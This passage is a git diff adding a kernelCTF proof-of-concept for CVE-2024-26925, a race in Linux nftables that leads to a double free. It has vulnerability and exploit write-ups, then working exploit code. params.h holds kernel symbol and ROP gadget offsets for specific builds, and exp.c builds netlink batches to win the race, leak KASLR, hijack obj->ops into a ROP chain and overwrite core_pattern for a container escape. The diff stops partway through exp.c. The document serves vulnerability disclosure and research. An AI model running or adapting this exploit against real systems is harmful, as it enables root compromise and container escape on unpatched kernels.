diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/exploit.md new file mode 100644 index 000000000..0021cf405 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/exploit.md @@ -0,0 +1,178 @@ +# Exploit details +The vulnerability is a locking issue that resides in __nf_tables_abort() during the call to nf_tables_module_autoload(), +which releases the mutex lock and causes GC sequence protection to be bypassed. To exploit this vulnerability, +we must find a reliable way to race the abort thread and the set GC thread. By doing so, we can turn this locking +issue into a double-free primitive. + +## Module Autoload + +Since nftables object types (e.g., `nft_tunnel_obj_type`, `nft_quota_obj_type`, etc.) might reside in external kernel modules, +encountering a type currently not present in nftables will first add the typename to `nft_net->module_list` and attempt +to load the corresponding type's kernel module during the abort phase via `nf_tables_module_autoload()`. + +Therefore, `nf_tables_module_autoload()` can be triggered by requesting a non-existent object type in a batch commit. + +```c +static const struct nft_object_type * +nft_obj_type_get(struct net *net, u32 objtype, u8 family) +{ + const struct nft_object_type *type; + + rcu_read_lock(); + type = __nft_obj_type_get(objtype, family); + + // ... + +#ifdef CONFIG_MODULES + if (type == NULL) { // if type does not exist + if (nft_request_module(net, "nft-obj-%u", objtype) == -EAGAIN) + return ERR_PTR(-EAGAIN); + } +#endif + return ERR_PTR(-ENOENT); +} +``` + +```c +__printf(2, 3) int nft_request_module(struct net *net, const char *fmt, ...) +{ + // ... + + nft_net = nft_pernet(net); + list_for_each_entry(req, &nft_net->module_list, list) { + if (!strcmp(req->module, module_name)) { + if (req->done) + return 0; + + /* A request to load this module already exists. */ + return -EAGAIN; + } + } + + req = kmalloc(sizeof(*req), GFP_KERNEL); + if (!req) + return -ENOMEM; + + req->done = false; + strscpy(req->module, module_name, MODULE_NAME_LEN); + list_add_tail(&req->list, &nft_net->module_list); // add to request list + + return -EAGAIN; +} +``` + +## Race to Double Free + +With this vulnerability, we can make the set GC procedure record the GC sequence and acquire the mutex lock +within the call to `__nf_tables_abort()` to bypass the GC sequence check. The goal is to free +the same set element twice during the handling of a batch commit. + +The race process is as follows: +- New `setelem A` +- New unknown type object (trigger `__nf_tables_abort()`) + - `nft_rhash_gc()` records expired `setelem A` + - `setelem A `unlinks from the set, `kfree`'d + - module autoload releases mutex lock + - `nft_trans_gc_work_done()` acquires mutex lock, bypassing GC sequence check + - `setelem A` `kfree`'d second time + +To increase the success rate of the race (and capture the kernelctf slot), we need to enlarge the two time windows in the race process: +1. For the GC thread, we want its timer to wake up and record `setelem A` after `__nf_tables_abort()` starts but before `setelem A` is removed from the set. Otherwise, `setelem A` cannot be recorded. +2. The module loading time should be long enough to ensure that `nft_trans_gc_work_done()` can acquire the mutex lock. + +To delay the removal of `setelem A` in `__nf_tables_abort()` from the set, we can add many operations after the creation of +`setelem A` in the batch commit. Since `__nf_tables_abort()` processes batch commit operations in reverse order, +these operations will be processed before removing `setelem A`. + +In order to maximize this delay, we pre-allocate multiple anonymous sets (`NFT_SET_MAP`) with many elements, +reference them through `dynset` expressions, and delete these expressions via `NFT_MSG_DELRULE` at the end of the batch commit. +This ensures that `nft_map_activate()` is called to traverse all set elements during the abort process, delaying the removal of `setelem A`. + +For the module autoload part, since all types waiting for autoload will not be removed from `nft_net->module_list` +even after autoloading finishes, and `nf_tables_module_autoload()` will always try to load the type in the list without +checking if `req->done` is set, each autoload trigger will reload all previously autoloaded types. + +```c +static void nf_tables_module_autoload(struct net *net) +{ + struct nftables_pernet *nft_net = nft_pernet(net); + struct nft_module_request *req, *next; + LIST_HEAD(module_list); + + list_splice_init(&nft_net->module_list, &module_list); + mutex_unlock(&nft_net->commit_mutex); + list_for_each_entry_safe(req, next, &module_list, list) { + request_module("%s", req->module); + req->done = true; + } + mutex_lock(&nft_net->commit_mutex); + list_splice(&module_list, &nft_net->module_list); +} +``` + +Therefore, we only need to attempt autoloading non-existent and non-repeating object types N times before +the new `setelem A` operation. Finally, triggering autoload with a non-existent object type after the new `setelem A` will trigger `request_module()` N+1 times. + +With the above adjustments, the batch commit used in the exploit includes the following operations: +- New unknown type object (1) +- ... +- New unknown type object (N) +- New `setelem A` (kmalloc-cg-256) +- Delete all dynset expressions (deactivate all pre-allocated setelems) +- New unknown type object (N+1) + +By extending the two race windows mentioned above, we should be able to reliably trigger the race condition and cause a double free, right? + +Actually, **no**. We were surprised to find that even if we extend the processing time of pre-allocated set elements to the scale of seconds, +`nft_rhash_gc()` still doesn't race with `__nf_tables_abort()`. + +We later found that for some reason, `nft_rhash_gc()` will not be scheduled by `system_power_efficient_wq` during high CPU usage. + +```c +static void nft_rhash_gc_init(const struct nft_set *set) +{ + struct nft_rhash *priv = nft_set_priv(set); + + queue_delayed_work(system_power_efficient_wq, &priv->gc_work, + nft_set_gc_interval(set)); +} +``` + +In our case, re-activating all pre-allocated set elements +in `__nf_tables_abort()` will cause high CPU usage, thus `nft_rhash_gc()` will not be scheduled. +To solve this problem, we switch the main thread to a different CPU using `set_cpu()` before the race. +Additionally, this provides a bonus: the slab allocator will not detect our double free because the same object is freed by two different CPUs. + +Once we can reliably trigger the race to cause double free, the free list in kmalloc-cg-256 will be `[A, A]`. + +## KASLR Bypass + +After obtaining the double free primitive, I used the same exploit method as in [CVE-2023-4004](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md). +Since there are now two elements A that have been double freed in the kmalloc-cg-256 free list, we can overlap `nft_table`'s `table->udata` with the `nft_object` object to leak `obj->ops` (address of `nft_ct_expect_obj_ops`). +- New `table A` (with `NFTA_TABLE_USERDATA` data length equals 256) +- New `object B` (`nft_ct_expect_obj`) +- Dump `table A` (leaking `object B` structure) + +After leaking the kernel address, restore the free list state to `[A, B, A]` to facilitate subsequent operations. + +## Control RIP + +At this stage, we again overlap `nft_table`'s `table->udata` with the `nft_object` object to control the `obj->ops` function table pointer, thereby controlling the RIP. + +We will first leak kernel heap address which we used to store fake `obj->ops` function pointer table. +- New `table A` (with `NFTA_TABLE_USERDATA` data length equals 256) +- New `table B` (with `NFTA_TABLE_USERDATA` data length equals 256) +- New `object C` (providing `NFTA_OBJ_USERDATA`, later used for faking `obj->ops`) +- Dump `table A` (leaking `obj->udata`) + +Then reallocate table to modify the overlapped `object C` and call to `obj->ops->dump` to trigger ROP +- Delete `table A` +- New `table D` (setting `obj->ops` to `obj->udata`, setting ROP chain) +- Dump `object C` (triggering ROP chain) + +## Container Escape + +We reuse the the exploit technique from [CVE-2023-4622](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4622_lts/docs/exploit.md#achieve-container-escape). + +By rewriting `core_pattern` to `|/proc/%P/fd/` and placing the binary in the corresponding fd via `memfd_create()`, +we can execute any binary outside the container when a coredump is triggered. diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/vulnerability.md new file mode 100644 index 000000000..6625aaa1b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/vulnerability.md @@ -0,0 +1,174 @@ +# Vulnerability Details +A locking issue was found in the Linux kernel netfilter/nftables subsystem (`net/netfilter/nf_tables_api.c`), +it leads to breaking the assumption in set asynchronous GC, which can be use to cause double free. + +The asynchronous set GC (`nft_rhash_gc` for example) does not acquire commit lock while doing the work, +instead, it use GC sequence (`gc_seq`) mechanism to protect it from racing with the transaction. +At the begin of `nft_rhash_gc` It will save the current GC sequence and allocate a GC transaction +to store information, then traverse the set to record all expired set element into GC transaction, +and finally call `nft_trans_gc_queue_async_done(gc)`. + +```c +static void nft_rhash_gc(struct work_struct *work) +{ + // ... + gc_seq = READ_ONCE(nft_net->gc_seq); // save GC sequence + + if (nft_set_gc_is_pending(set)) + goto done; + + gc = nft_trans_gc_alloc(set, gc_seq, GFP_KERNEL); + if (!gc) + goto done; + + // ... + while ((he = rhashtable_walk_next(&hti))) { + // check if setelem expired + if (!nft_set_elem_expired(&he->ext)) + continue; + + // ... + nft_trans_gc_elem_add(gc, he); + } + + if (gc) + nft_trans_gc_queue_async_done(gc); + + // ... +} +``` + +The function `nft_trans_gc_queue_async_done(gc)` saves the GC transaction into a global list and eventually schedules +`nft_trans_gc_work()` to run. `nft_trans_gc_work()` then retrieves the gc transaction and calls `nft_trans_gc_work_done()` +to perform check on GC sequence. + +```c +static void nft_trans_gc_work(struct work_struct *work) +{ + // ... + list_for_each_entry_safe(trans, next, &trans_gc_list, list) { + list_del(&trans->list); + if (!nft_trans_gc_work_done(trans)) { // do the check here + nft_trans_gc_destroy(trans); + continue; + } + call_rcu(&trans->rcu, nft_trans_gc_trans_free); + } +} +``` + +The function `nft_trans_gc_work_done()` will first acquire the commit lock, and compare the saved GC sequence +with current GC sequence, if they are different, means we race with the transaction, since all critical section +which modify the control plane are surrounded by `nft_gc_seq_begin()` and `nft_gc_seq_end()` which both increase +the current GC sequence (`nft_net->gc_seq`), so if it's the case, it means the state of the set may have been changed, +and the function will return false to stop processing this GC transaction. + + +```c +static bool nft_trans_gc_work_done(struct nft_trans_gc *trans) +{ + struct nftables_pernet *nft_net; + struct nft_ctx ctx = {}; + + nft_net = nft_pernet(trans->net); + + mutex_lock(&nft_net->commit_mutex); // acquire global mutex + + /* Check for race with transaction, otherwise this batch refers to + * stale objects that might not be there anymore. Skip transaction if + * set has been destroyed from control plane transaction in case gc + * worker loses race. + */ + if (READ_ONCE(nft_net->gc_seq) != trans->seq || trans->set->dead) { // check gc sequence to prevent race + mutex_unlock(&nft_net->commit_mutex); + return false; + } + + ctx.net = trans->net; + ctx.table = trans->set->table; + + nft_trans_gc_setelem_remove(&ctx, trans); + mutex_unlock(&nft_net->commit_mutex); + + return true; +} +``` + +However, the GC sequence mechanism only works under the assumption that the commit lock should not be released +during the critical section between `nft_gc_seq_begin()` and `nft_gc_seq_end()`. Otherwise, a GC thread +may record the expired object and obtain the released commit lock within the same `gc_seq`, thus bypassing the GC sequence check. + +`__nf_tables_abort()` is the one does it wrong, the function is surrounded by `nft_gc_seq_begin()` and `nft_gc_seq_end()`, +if it received the action `NFNL_ABORT_AUTOLOAD`, `nf_tables_module_autoload()` will be called to process the module requests, +however, the function release the commit lock before processing the module request, which breaks the assumption of GC +sequence and leads to double free. + +```c +static int nf_tables_abort(struct net *net, struct sk_buff *skb, + enum nfnl_abort_action action) +{ + gc_seq = nft_gc_seq_begin(nft_net); // gc_seq++ + ret = __nf_tables_abort(net, action); + nft_gc_seq_end(nft_net, gc_seq); // gc_seq++ + mutex_unlock(&nft_net->commit_mutex); + + return ret; +} + +static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action) +{ + // ... + + if (action == NFNL_ABORT_AUTOLOAD) + nf_tables_module_autoload(net); // load modules + else + nf_tables_module_autoload_cleanup(net); + + return 0; +} + +static void nf_tables_module_autoload(struct net *net) +{ + struct nftables_pernet *nft_net = nft_pernet(net); + struct nft_module_request *req, *next; + LIST_HEAD(module_list); + + list_splice_init(&nft_net->module_list, &module_list); + mutex_unlock(&nft_net->commit_mutex); // BUG: release mutex lock inside GC sequence critical section + list_for_each_entry_safe(req, next, &module_list, list) { + request_module("%s", req->module); + req->done = true; + } + mutex_lock(&nft_net->commit_mutex); + list_splice(&module_list, &nft_net->module_list); +} +``` + +## Requirements to trigger the vulnerability +- Capabilities: `CAP_NET_ADMIN` capability is required. +- Kernel configuration: `CONFIG_NETFILTER`, `CONFIG_NF_TABLES` +- User namespace: As this vulnerability requires `CAP_NET_ADMIN`, which is not usually given to the normal user, we used the unprivileged user namespace to achieve this capability. + +## Commit which introduced the vulnerability +- The vulnerability was introduced in Linux v6.5, with commit [720344340fb9be2765bbaab7b292ece0a4570eae](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=720344340fb9be2765bbaab7b292ece0a4570eae) +- An incomplete fix to new GC transaction API introduced this vulnerability. + +## Commit which fixed the vulnerability +- The vulnerability was fixed in Linux v6.9-rc3, with commit [0d459e2ffb541841714839e8228b845458ed3b27](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0d459e2ffb541841714839e8228b845458ed3b27) +- The commit move the call to `nf_tables_module_autoload()` after `nft_gc_seq_end()` to fix the check. + +## Affected kernel versions +- Linux version v6.5 ~ v6.9-rc2 affects to this vulnerability +- For LTS versions + - v5.15.134 ~ + - v6.1.56 ~ + +## Affected component, subsystem +- netfilter/nf_tables + +## Cause (UAF, BoF, race condition, double free, refcount overflow, etc) +- Locking issue leads to double free + +## Which syscalls or syscall parameters are needed to be blocked to prevent triggering the vulnerability? (If there is any easy way to block it.) +- Disable syscalls for netfilter (specifically, nftables) subsystem (ex. `socket`, `sendmsg` with netlink socket) to prevent this vulnerability. +- Disable syscalls for unprivileged user namespace (ex. `clone`, `unshare`) can reduce the attack surface since the netfilter subsystem requires `CAP_NET_ADMIN` to use. diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/Makefile b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/Makefile new file mode 120000 index 000000000..75cfe352b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/Makefile @@ -0,0 +1 @@ +../lts-6.1.81/Makefile \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/deps.tar.gz b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/deps.tar.gz new file mode 120000 index 000000000..d8246344b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/deps.tar.gz @@ -0,0 +1 @@ +../lts-6.1.81/deps.tar.gz \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exp.c b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exp.c new file mode 120000 index 000000000..aee5d5387 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exp.c @@ -0,0 +1 @@ +../lts-6.1.81/exp.c \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exploit b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exploit new file mode 100755 index 000000000..4e04934ce Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/params.h b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/params.h new file mode 100644 index 000000000..de73712ec --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/params.h @@ -0,0 +1,16 @@ +#include +#include +size_t nft_ct_expect_obj_type = 0x271c120; +size_t nft_ct_expect_obj_ops = 0x1acba40; +size_t core_pattern = 0x259e7a0; +size_t rcu_read_unlock = 0x120127b; // Symbol '__rcu_read_unlock' not found. (use ret here) +size_t copy_from_user = 0x776520; +size_t delay_loop = 0x7d6c70; + +size_t pop_rdi = 0x81910; +size_t pop_rsi = 0x1a9d38; +size_t pop_rdx = 0x1a9725; +size_t pop_3 = 0x68158; // pop r12 ; pop rbp ; pop rbx ; ret +size_t pop_rsp_ret = 0x106deb; +size_t add_rsp_0x50 = 0x190786; // add rsp, 0x50 ; jmp 0xffffffff82203980 (ret) +size_t push_rsi_jmp_deref_rsi_0x39 = 0x8a2d27; // push rsi ; jmp qword ptr [rsi + 0x39] diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/root.c b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/root.c new file mode 120000 index 000000000..0b1b7059b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/root.c @@ -0,0 +1 @@ +../lts-6.1.81/root.c \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/run.sh b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/run.sh new file mode 120000 index 000000000..6bda7800d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/run.sh @@ -0,0 +1 @@ +../lts-6.1.81/run.sh \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/tools.h b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/tools.h new file mode 120000 index 000000000..bb472ccd4 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/tools.h @@ -0,0 +1 @@ +../lts-6.1.81/tools.h \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/Makefile b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/Makefile new file mode 100644 index 000000000..9a3a72b67 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/Makefile @@ -0,0 +1,19 @@ +all: exploit + +exploit: exp root + tar czf exp.tar.gz exp root + cp run.sh exploit + fallocate -l 512 exploit + dd if=exp.tar.gz of=exploit conv=notrunc oflag=append + rm exp.tar.gz exp root + +exp: exp.c params.h tools.h + tar xzf deps.tar.gz + gcc exp.c -static -Ldeps/lib -lnftnl -lmnl -lnl-3 -Ideps/include -o exp + rm -r deps + +root: root.c + gcc root.c -static -o root + +clean: + rm -f exploit exp root diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/deps.tar.gz b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/deps.tar.gz new file mode 100644 index 000000000..3e3024f68 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/deps.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/exp.c b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/exp.c new file mode 100644 index 000000000..131044e74 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/exp.c @@ -0,0 +1,714 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include + +#include +#include +#include +#include +#include + +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include + +#include "tools.h" +#include "params.h" + +const unsigned blocking_set_cnt = 200; // fixed counts +const unsigned module_load_cnt = 200; // only needs it to be big enough +unsigned gc_interval = 100; +unsigned setelem_timeout = 350; + +char buffer[0x1000]; +char user_buf[] = "|/proc/%P/fd/666"; +size_t *leaked_data; +size_t kbase; +size_t fake_ops; + +void wait_gc() { + progress("wait for garbage collection"); + sleep(1); + done(); +} + +struct nftnl_table *new_table(const char *name) { + struct nftnl_table *t; + + t = nftnl_table_alloc(); + if (!t) + error("new_table"); + + nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, NFPROTO_IPV4); + nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); + + return t; +} + +void add_dynset(struct nftnl_rule *r, const char *set) { + struct nftnl_expr *e; + e = nftnl_expr_alloc("dynset"); + if (!e) + error("new_expr"); + + nftnl_expr_set_str(e, NFTNL_EXPR_DYNSET_SET_NAME, set); + nftnl_expr_set_u32(e, NFTNL_EXPR_DYNSET_OP, 0); + nftnl_expr_set_u32(e, NFTNL_EXPR_DYNSET_SREG_KEY, NFT_REG32_00); + nftnl_expr_set_u32(e, NFTNL_EXPR_DYNSET_SREG_DATA, NFT_REG32_00); + nftnl_rule_add_expr(r, e); +} + +struct nftnl_rule *new_rule(const char *table, const char *chain) { + struct nftnl_rule *r = NULL; + + r = nftnl_rule_alloc(); + if (r == NULL) { + perror("OOM"); + exit(EXIT_FAILURE); + } + + nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table); + nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain); + nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, NFPROTO_IPV4); + return r; +} + +struct nftnl_obj *new_object(const char *table, const char *name) { + struct nftnl_obj *t; + + t = nftnl_obj_alloc(); + if (!t) + error("new_object"); + + nftnl_obj_set_u32(t, NFTNL_OBJ_FAMILY, NFPROTO_IPV4); + nftnl_obj_set_u32(t, NFTNL_OBJ_TYPE, NFT_OBJECT_CT_EXPECT); + nftnl_obj_set_str(t, NFTNL_OBJ_TABLE, table); + nftnl_obj_set_str(t, NFTNL_OBJ_NAME, name); + nftnl_obj_set_u8(t, NFTNL_OBJ_CT_EXPECT_L4PROTO, IPPROTO_TCP); + nftnl_obj_set_u8(t, NFTNL_OBJ_CT_EXPECT_SIZE, 0x41); + nftnl_obj_set_u16(t, NFTNL_OBJ_CT_EXPECT_DPORT, 0x4141); + nftnl_obj_set_u32(t, NFTNL_OBJ_CT_EXPECT_TIMEOUT, 0x41414141); + + return t; +} + +void nftnl_obj_nlmsg_build_simple_payload(struct nlmsghdr *nlh, + const char *table, const char *name, uint32_t type) { + mnl_attr_put_strz(nlh, NFTA_OBJ_TABLE, table); + mnl_attr_put_strz(nlh, NFTA_OBJ_NAME, name); + mnl_attr_put_u32(nlh, NFTA_OBJ_TYPE, htonl(type)); + mnl_attr_put_strz(nlh, NFTA_OBJ_DATA, "DATA"); +} + +struct nftnl_set *new_hash_set(const char *table, const char *name) { + struct nftnl_set *s = NULL; + + s = nftnl_set_alloc(); + if (!s) + error("new_set"); + + nftnl_set_set_str(s, NFTNL_SET_TABLE, table); + nftnl_set_set_u32(s, NFTNL_SET_FAMILY, NFPROTO_IPV4); + nftnl_set_set_str(s, NFTNL_SET_NAME, name); + nftnl_set_set_u32(s, NFTNL_SET_KEY_LEN, sizeof(uint32_t)); + nftnl_set_set_u32(s, NFTNL_SET_KEY_TYPE, 13); + nftnl_set_set_u32(s, NFTNL_SET_ID, 1); + nftnl_set_set_u32(s, NFTNL_SET_FLAGS, NFT_SET_MAP | NFT_SET_ANONYMOUS); + nftnl_set_set_u32(s, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE); + nftnl_set_set_u32(s, NFTNL_SET_DATA_LEN, 4); + + return s; +} + +struct nftnl_set *new_rhash_set(const char *table, const char *name) { + struct nftnl_set *s = NULL; + + s = nftnl_set_alloc(); + if (!s) + error("new_set"); + + nftnl_set_set_str(s, NFTNL_SET_TABLE, table); + nftnl_set_set_u32(s, NFTNL_SET_FAMILY, NFPROTO_IPV4); + nftnl_set_set_str(s, NFTNL_SET_NAME, name); + nftnl_set_set_u32(s, NFTNL_SET_KEY_LEN, sizeof(uint32_t)); + nftnl_set_set_u32(s, NFTNL_SET_KEY_TYPE, 13); + nftnl_set_set_u32(s, NFTNL_SET_ID, 1); + nftnl_set_set_u32(s, NFTNL_SET_FLAGS, NFT_SET_MAP | NFT_SET_TIMEOUT); + nftnl_set_set_u32(s, NFTNL_SET_GC_INTERVAL, gc_interval); // default: 0 (1s) + nftnl_set_set_u32(s, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE); + nftnl_set_set_u32(s, NFTNL_SET_DATA_LEN, 4); + + return s; +} + +struct nftnl_set_elem *new_setelem_key(int len, int key) { + struct nftnl_set_elem *e; + uint32_t flags = 0; + + e = nftnl_set_elem_alloc(); + if (!e) + error("new_setelem"); + + nftnl_set_elem_set_u32(e, NFTNL_SET_ELEM_KEY, key); + nftnl_set_elem_set(e, NFTNL_SET_ELEM_DATA, buffer, 4); // use the same as SET_DATA_LEN + nftnl_set_elem_set(e, NFTNL_SET_ELEM_USERDATA, buffer, len); + nftnl_set_elem_set(e, NFTNL_SET_ELEM_FLAGS, &flags, sizeof(flags)); + + return e; +} + +struct nftnl_set_elem *new_setelem_timeout(int len, int timeout) { + struct nftnl_set_elem *e; + uint32_t flags = 0; + + e = nftnl_set_elem_alloc(); + if (!e) + error("new_setelem"); + + nftnl_set_elem_set_u64(e, NFTNL_SET_ELEM_TIMEOUT, timeout); + nftnl_set_elem_set_u32(e, NFTNL_SET_ELEM_KEY, 0x4141); + nftnl_set_elem_set(e, NFTNL_SET_ELEM_DATA, buffer, 4); // use the same as SET_DATA_LEN + nftnl_set_elem_set(e, NFTNL_SET_ELEM_USERDATA, buffer, len); + nftnl_set_elem_set(e, NFTNL_SET_ELEM_FLAGS, &flags, sizeof(flags)); + + return e; +} + +struct nftnl_chain *new_chain(const char *table, const char *name) { + struct nftnl_chain *t; + t = nftnl_chain_alloc(); + if (!t) + error("new_chain"); + + nftnl_chain_set_str(t, NFTNL_CHAIN_TABLE, table); + nftnl_chain_set_str(t, NFTNL_CHAIN_NAME, name); + + return t; +} + +int leak_object_cb(const struct nlmsghdr *nlh, void *data) { + struct nftnl_table *t; + struct nlattr *nla[NFTA_TABLE_MAX+1] = {}; + struct nlattr *attr; + int len, attrlen; + + if (nlh->nlmsg_type == NLMSG_ERROR) { + error_s("received NLMSG_ERROR message"); + } + + attr = (struct nlattr *)((char *)nlh + nlmsg_total_size(sizeof(struct nfgenmsg))); + attrlen = nlh->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg)); + nla_parse(nla, NFTA_TABLE_MAX, attr, attrlen, NULL); + + if (!nla[NFTA_TABLE_USERDATA]) { + error_s("not received userdata"); + } + + free(leaked_data); + len = nla_len(nla[NFTA_TABLE_USERDATA]); + leaked_data = malloc(len); + + nla_memcpy(leaked_data, nla[NFTA_TABLE_USERDATA], len); + hexdump(leaked_data, 0x40); + + // sanity check (obj->ops) + if (leaked_data[16] < 0xffffffff00000000UL) { + error_s("object leak failed"); + } + + return MNL_CB_OK; +} + +void recv_nft_reply(struct mnl_socket *nl) { + char buf[MNL_SOCKET_BUFFER_SIZE]; + + // filter error report + while (true) { + int ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + if (ret < 0) { + error("mnl_socket_recvfrom"); + } else if (ret > 100) { + uint32_t type = NFTNL_OUTPUT_DEFAULT; + mnl_cb_run(buf, ret, seq, mnl_socket_get_portid(nl), leak_object_cb, &type); + break; + } + } +} + +void setup_block(struct mnl_socket *nl, const char *tablename, const char *chainname, const char *setname) { + struct nftnl_set *set; + struct nftnl_rule *rule; + struct nftnl_obj *obj; + struct nftnl_set_elem *setelem; + struct nlmsghdr *nlh; + struct mnl_nlmsg_batch *batch; + int ret, key = 0x10000; + + // use anonymous set + set = new_hash_set(tablename, setname); + rule = new_rule(tablename, chainname); + add_dynset(rule, setname); + + // maximum: 0x68000 + int bufsz = 0x68000; + setsockopt(mnl_socket_get_fd(nl), SOL_SOCKET, + SO_SNDBUF, &bufsz, sizeof(bufsz)); + + char *reqbuf = malloc(bufsz); + BATCH_BEGIN(batch, reqbuf, bufsz); + + // build blocking anonymous set + NEW_SET(batch, nlh, set); + + /* create a bunch of (9500) setelem to delay */ + /* compress batch request to save some time */ + // total batch size should < 0x68000 + for (int i = 0; i < 19; ++i) { + set = new_hash_set(tablename, setname); + // single request size should < 0x10000 + for (int j = 0; j < 500; ++j) { + setelem = new_setelem_key(1, key++); + nftnl_set_elem_add(set, setelem); + } + + NEW_SETELEM(batch, nlh, set); + nftnl_set_free(set); + } + + // build rule to ref anonymous set + NEW_RULE(batch, nlh, rule); + + BATCH_END_SEND(batch, nl); + + free(reqbuf); +} + +size_t exploit_vuln(struct mnl_socket *nl, const char *tablename) { + char buf[MNL_SOCKET_BUFFER_SIZE]; + struct mnl_nlmsg_batch *batch; + struct nftnl_obj *obj; + struct nftnl_table *tables[2]; + struct nlmsghdr *nlh; + int ret; + + info("build fake obj->ops"); + + size_t *fake_ops = (size_t *)malloc(192); + memset(fake_ops, 0x41, 192); + + // [0] for rop chain on fake obj to pop off return value + fake_ops[0] = kbase + pop_rdi; + fake_ops[4] = kbase + push_rsi_jmp_deref_rsi_0x39; // ops->dump + fake_ops[6] = kbase + nft_ct_expect_obj_type; // ops->type + + BATCH_BEGIN(batch, buf, sizeof(buf)); + + for (int i = 0; i < 2; ++i) { + char name[0x20] = {0}; + sprintf(name, "tbl_%u", seq++); + tables[i] = new_table(name); + nftnl_table_set_data(tables[i], NFTNL_TABLE_USERDATA, buffer, 256); + NEW_TABLE(batch, nlh, tables[i]); + } + + // should <= 192 since atm there's only corrupted entry left + obj = new_object(tablename, "leak_rop_obj"); + nftnl_obj_set_data(obj, NFTNL_OBJ_USERDATA, fake_ops, 192); + NEW_OBJ(batch, nlh, obj); + + BATCH_END_SEND(batch, nl); + + nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETTABLE, NFPROTO_IPV4, + NLM_F_ACK, seq); // do not update seq number here + nftnl_table_nlmsg_build_payload(nlh, tables[0]); + + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + error("mnl_socket_sendto"); + } + + recv_nft_reply(nl); + + size_t *fake_obj = leaked_data; + size_t fake_ops_addr = leaked_data[9]; + info("leak kheap: 0x%lx", fake_ops_addr); + + // deallocate object by freeing table + info("deallocate object"); + + BATCH_BEGIN(batch, buf, sizeof(buf)); + DEL_TABLE(batch, nlh, tables[0]); + BATCH_END_SEND(batch, nl); + 